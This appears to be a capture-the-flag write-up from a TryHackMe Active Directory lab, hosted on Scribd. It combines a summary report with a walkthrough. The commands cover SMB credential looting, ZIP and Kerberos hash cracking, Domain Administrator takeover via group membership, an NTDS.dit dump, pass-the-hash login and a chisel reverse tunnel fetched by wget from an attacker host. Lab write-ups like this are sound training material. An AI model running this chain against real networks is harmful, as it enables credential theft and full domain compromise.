KEMBAR78
Report | PDF | Password | Zip (File Format)
Scribd
Upload
872 views6 pages

Report

Uploaded by

Muhammad Zeeshan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
872 views6 pages

Report

Uploaded by

Muhammad Zeeshan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

Active Directory Penetration Test Summary

Target

• Domain Controller (DC): 10.200.150.10


• Workstation (WRK): 10.200.150.20 (WRK.TRYHACKME.LOC)
• Domain: TRYHACKME.LOC

1. Overview

The penetration test targeted the Active Directory infrastructure of TRYHACKME.LOC, focusing primar-
ily on the domain controller (10.200.150.10) and an associated workstation (10.200.150.20).
The assessment identified multiple weaknesses in authentication, access control, and network con-
figuration, which enabled initial access, privilege escalation, and full domain compromise. The test
demonstrated how an attacker could leverage weak credentials, Kerberos service vulnerabilities, and
misconfigured SMB shares to escalate privileges and extract sensitive domain data.

2. Scope

• User Enumeration and Credential Access: Identification and validation of domain users and
passwords.
• SMB Share Enumeration and File Access: Access to shared folders on WRK and DC, extraction
of credential archives.
• Kerberos Attacks (Kerberoasting): Enumeration and cracking of service account credentials.
• Privilege Escalation: Adding users to privileged groups via SMB RPC.
• Domain Credentials Dumping: Extraction of NTDS.dit hashes for domain users.
• Remote Access: Authentication and shell access via WinRM with compromised credentials.
• Network Tunneling: Setup of reverse proxy tunnels to enable persistent access.
• Flag Extraction: Retrieval of user and domain flags to demonstrate full system compromise.

3. Impact

• Initial foothold gained on workstation (10.200.150.20) by exploiting SMB shares containing


weakly protected credentials.

1
• Privilege escalation achieved on domain controller (10.200.150.10) through Kerberoasting
and group membership abuse.
• Full domain compromise via dumping and cracking domain hashes from NTDS.dit.
• Complete administrative control over Active Directory environment obtained.
• Sensitive data exposure including user credentials and critical domain information.
• Potential for persistent and stealthy access via network tunneling techniques.

This level of compromise allows attackers to control all domain resources, impersonate any user,
and maintain undetected access, posing a critical security risk.

4. Conclusion

The Active Directory environment of TRYHACKME.LOC is critically vulnerable due to weak credential
management, insufficient Kerberos protections, lax SMB share security, and lack of strict privilege
control. These flaws allowed seamless escalation from workstation access to full domain administrator
control. Immediate remediation is essential to mitigate these risks and secure the domain against
both internal and external threats.

Attack Walkthrough

Target: Workstation

• Machine IP: 10.200.150.20


• Domain: WRK.TRYHACKME.LOC

Step 1: Hostname Resolution Add domain to /etc/hosts to resolve the hostname locally:

1 echo "10.200.150.20 WRK.TRYHACKME.LOC" >> /etc/hosts

Step 2: SMB Share Enumeration & File Download Use smbclient to connect to a shared folder
and list files:

1 smbclient \\tryhackme.loc\safe

When prompted for password, press enter (empty password or try default credentials if known).

List files inside the share:

2
1 smb: \> ls

Download the credentials archive:

1 smb: \> get creds.zip


2 smb: \> exit

Step 3: Crack ZIP Password Use John the Ripper to crack the ZIP password:

1 john --wordlist=/usr/share/wordlists/rockyou.txt hash

Output reveals password: Passw0rd

Step 4: Extract ZIP File Extract the password-protected archive with 7zip:

1 7z x creds.zip

Enter password: Passw0rd


Check extracted file contents:

1 cat creds.txt

Credentials found: - Username: John - Password: VerySafePassword!

Step 5: Remote Login via WinRM Use nxc or evil-winrm to authenticate with extracted creden-
tials:

1 nxc winrm 10.200.150.20 -u "John" -p 'VerySafePassword!'


2 # or
3 evil-winrm -i 10.200.150.20 -u 'John' -p 'VerySafePassword!'

Successful login provides PowerShell shell.

Step 6: Access User Flag Navigate to user’s desktop and read the flag:

1 cd C:\Users\john\Desktop
2 cd C:\> type user.txt

Flag:

1 THM{58b41573-062b-42ea-b312-dd5b7cc27671}

3
Target: Domain Controller - 10.200.150.10

Executive Summary The Domain Controller (DC) at IP 10.200.150.10 was assessed for Active
Directory and network security vulnerabilities. Multiple weaknesses were identified allowing privilege
escalation from a low-privileged user (j.phillips) to full Domain Administrator access, enabling
complete domain compromise. Critical findings include weak Kerberos security (Kerberoasting),
improper group membership management, unrestricted access to sensitive data like NTDS.dit, and
unmonitored network tunnels.

1. User Enumeration & Initial Access

• Discovered user j.phillips exists in the domain.


• Credentials for j.phillips were cracked or obtained (password: Welcome1).
• Verified SMB login on DC with these credentials.

Command:

1 proxychains nxc smb 10.200.150.10 -u 'j.phillips' -p 'Welcome1'

Result: Successful SMB login.

2. Kerberos SPN Enumeration & TGS Ticket Request (Kerberoasting) Enumerated Service Princi-
pal Names (SPNs) assigned to domain accounts to find accounts eligible for Kerberoasting.

Command:

1 proxychains impacket-GetUserSPNs tryhackme.loc/j.phillips:'Welcome1' -


dc-ip 10.200.150.10

Found SPN: HTTP/csm.tryhackme.loc tied to user j.phillips.

Requested Kerberos TGS ticket hashes for offline cracking:

1 proxychains impacket-GetUserSPNs tryhackme.loc/j.phillips:'Welcome1' -


dc-ip 10.200.150.10 -request

3. Cracking Kerberos TGS Hash Cracked extracted TGS hash offline with john using rockyou
wordlist.

1 john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Password cracked: Welcome1 (matches the user password).

4
4. Adding User to Domain Admins Group Used SMB RPC command to add j.phillips to the
Administrators group.

Command:

1 proxychains net rpc group addmem "Administrators" "j.phillips" -U "


tryhackme.loc/j.phillips%Welcome1" -S 10.200.150.10

Added successfully with no restrictions.

5. NTDS.dit Dump to Obtain Domain Hashes Dumped domain credential hashes, including high-
privilege accounts like Administrator.

Command:

1 proxychains netexec smb 10.200.150.10 -u "j.phillips" -p 'Welcome1' --


ntds

Result: Obtained NT hashes of domain users, critical for further lateral movement.

6. Access Domain Administrator Account Used dumped Administrator hash to login via Evil-
WinRM.

Command:

1 proxychains evil-winrm -i 10.200.150.10 -u Administrator -H <


Administrator NT hash>

Successful login to DC as Administrator.

7. Final Flag Location & Extraction Upon Administrator login, navigated to root directory:

1 cd C:\
2 dir
3 type flag.txt

Flag Content:

1 THM{6ce25b12-0c89-41ba-a165-452cac91253c}

8. Reverse Proxy Setup (Chisel) Established reverse SOCKS proxy using chisel to tunnel traffic and
enable SMB/RPC relay.

Local (Kali) Server:

5
1 sudo ./chisel server --reverse --port 9999

Remote (Windows DC) Client:

1 wget http://<kali_ip>:8000/chisel_1.10.1_windows_amd64.exe -O chisel.


exe
2 .\chisel.exe client <kali_ip>:9999 socks5

Configured proxychains on Kali to route traffic through chisel.

You might also like